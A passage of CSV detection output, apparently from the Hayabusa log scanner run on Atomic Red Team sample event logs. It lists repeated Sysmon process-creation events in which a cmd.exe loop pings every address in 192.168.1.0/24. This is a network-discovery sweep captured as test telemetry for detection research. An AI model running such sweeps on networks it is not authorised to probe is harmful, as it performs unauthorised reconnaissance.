192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process 